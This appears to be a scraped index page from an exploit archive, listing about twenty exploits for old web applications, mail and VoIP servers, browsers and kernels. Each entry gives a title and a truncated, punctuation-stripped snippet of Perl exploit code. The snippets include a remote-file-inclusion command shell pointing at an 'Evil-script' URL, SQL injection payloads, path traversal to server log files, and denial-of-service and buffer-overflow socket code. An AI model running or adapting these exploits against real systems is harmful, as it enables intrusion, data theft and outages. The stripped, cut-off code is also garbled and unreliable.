MiniGal b13 (image backdoor) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=- MiniGal b13 -=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=- Author : Dj7xpl / Dj7xplatYahoodotcom Type : Remo...

MiniGal b13 (image backdoor) Remote Code Execution Exploit

Exploit for unknown platform in category web applications ========================================================== MiniGal b13 image backdoor Remote Code Execution Exploit ========================================================== !/usr/bin/perl...

HP_MQC_Run_Any_Query.txt

!/usr/bin/perl HP Mercury Quality Center runQuery exploit. Run whatever SQL you want on there db - without SQL injection. Problem is client can do "RunQuery" command os we write program to do this. Client can lots other things it should not also! The backend database can be MSSQLServer or Oracle ...

HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit

Exploit for multiple platform in category remote exploits ==================================================================== HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit ==================================================================== !/usr/bin/perl HP Mercury Qualit...

[Full-disclosure] HP Mercury Quality Center Any SQL execution

Vendor: HP Product: Mercury Quality Center Version: 9.0 build 9.1.0.4352 Vendor Informed: No HP Mercury Quality Center is test management product for companys to do software testing and quality insurance. HP Mercury Quality Center has additional guest command on server which allows any user who...

sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit

No description provided by source. !/usr/bin/perl sBLOG 0.7.3 Betainc/lang.phpLocal File Inclusion Exploit D.Script: http://sourceforge.net/projects/sblog/ V.Code: ifisset$conflangdefault && fileexists'lang/' . $conflangdefault . '.php' require'lang/' . $conflangdefault . '.php'; Discovered...

sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit

Exploit for unknown platform in category web applications ===================================== sBLOG 0.7.3 Beta inc/lang.php Local File Inclusion Exploit ============================================================ !/usr/bin/perl sBLOG 0.7.3 Betainc/lang.phpLocal File Inclusion Exploit D.Script:...

Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

Xoops All Version -Articles- Print.PHP ID Blind SQL Injection Exploit And PoC Type : SQL Injection Release Date : 2007-03-26 Product / Vendor : Xoops Portal http://www.Xoops.Org Bug : http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0 PoC :...

Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY use IO::Socket::INET; die "Usage $0 dst dport dusername src sport susername" unless $ARGV5; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0;...

Mercury32 Mail Server 4.0.1 - LOGIN Remote IMAP Stack Buffer Overflow

Mercury32 Mail Server 4.0.1 - LOGIN Remote IMAP Stack Buffer Overflow !/usr/bin/perl https://www.securityfocus.com/bid/11775 credit to Muts for this vulnerability acaro at jervus.it use IO::Socket::INET; use Switch; if @ARGV 3 print...

Linux Kernel 2.0.x2.2.x2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure

Linux Kernel 2.0.x2.2.x2.4.x FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. Frames that are small...

Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage

!/usr/bin/perl -w etherleak, code that has been 5 years coming. On 04/27/2002, I disclosed on the Linux Kernel Mailing list, a vulnerability that would be come known as the 'etherleak' bug. In various situations an ethernet frame must be padded to reach a specific size or fall on a certain...

phpraid-rfi.txt

!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell $"; while $cmd=$;...

PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit

No description provided by source. !/usr/bin/perl Modulo Splatt Forum v4.0 RC1bbcoderef.php nameLocal File Include Exploit D.Script: http://sourceforge.net/projects/splattforum/ V.Code $modulename = $name; -------- Line : 17 include"modules/".$modulename."/functions.php"; -------- Line : 19 Dork:...

overtheledger.txt

Hi; Affected versions: LedgerSMB 1.1.10 but see below, current is 1.1.11 SQL-Ledger 2.6.27 but see below. Current is 2.6.27 Effects: Arbitrary code execution both products and authentication bypass SQL-Ledger only. We have discovered yet another major security issue in both SQL-Ledger for affecte...

pragmaMX Module Landkarten 2.1 Local File Inclusion Exploit (win)

Exploit for unknown platform in category web applications ================================================================= pragmaMX Module Landkarten 2.1 Local File Inclusion Exploit win ================================================================= !Perl pragmaMX Landkartenmodule 2.1 Local...

Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit

Exploit for unknown platform in category dos / poc ================================================================== Avant Browser 1, LocalAddr = 'localhost', LocalPort = 80, Proto = 'tcp'; die unless $sock; $huge="A" x 1034985; $|=1; print...

Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl Woltlab Burning Board 2.X usergroups.php SQL Injection exploit - burned2.pl written by x666 [email protected] jmp-esp.kicks-ass.net;blueshisha.chills.it SR-CREW should work on every wbb regardless of php settings. use strict; use warnings;...

MS Internet Explorer (FTP Server Response) DoS Exploit (MS07-016)

No description provided by source. !/usr/bin/perl MS 07-016 FTP Server Response PoC Usage: ./ms07016ftp.pl LISTENIP Tested Against: MSIE 6.02900.2180 SP2 Details: The response is broken into buffers, either at length 1024, or at ' '. Each buffer is apended with x00, without...

Zomplog 3.7.6 (Windows x86) - Local File Inclusion

Made by Bl0od3r tech-bl0od3r.blogspot.com use IO::Socket; use Switch; $port = "80"; $target = @ARGV0; $folder = @ARGV1; @paths= "../../../../../var/log/httpd/accesslog", "../../../../../var/log/httpd/errorlog", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log"...